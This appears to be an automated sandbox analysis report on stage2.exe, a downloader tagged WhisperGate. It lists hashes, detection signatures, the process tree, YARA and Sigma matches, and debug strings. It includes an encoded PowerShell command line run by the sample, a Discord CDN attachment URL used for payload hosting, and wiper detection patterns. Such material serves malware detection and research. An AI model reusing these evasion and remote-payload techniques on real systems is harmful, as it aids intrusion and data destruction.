
Windows Analysis Report: stage2.exe

Overview

General Information

Sample Name: stage2.exe
Analysis ID: 553986
MD5: 14c8482f302b5e81e3fa1b18a509289d
SHA1: 16525cb2fd86dce842107eb1ba6174b23f188537
SHA256: dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags: DEV-0586, exe, WhisperGate

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
stage2.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exe | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exe | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084 | JoeSecurity_MSIL_Downloader_Generic | Yara detected MSIL_Downloader_Generic | Joe Security

    Unpacked PEs

    Source | Rule | Description | Author | Strings
    1.2.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.2.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    1.2.stage2.exe.ea0000.0.unpack | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Encoded PowerShell Command Line
    Source: Process started; Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Suspicious Execution of Powershell with Base64
    Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Non Interactive PowerShell
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: T1086 PowerShell Execution
    Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: stage2.exe; Virustotal: Detection: 44%
    Source: stage2.exe; ReversingLabs: Detection: 48%
    Machine Learning detection for sample
    Source: stage2.exe; Joe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: stage2.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: stage2.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
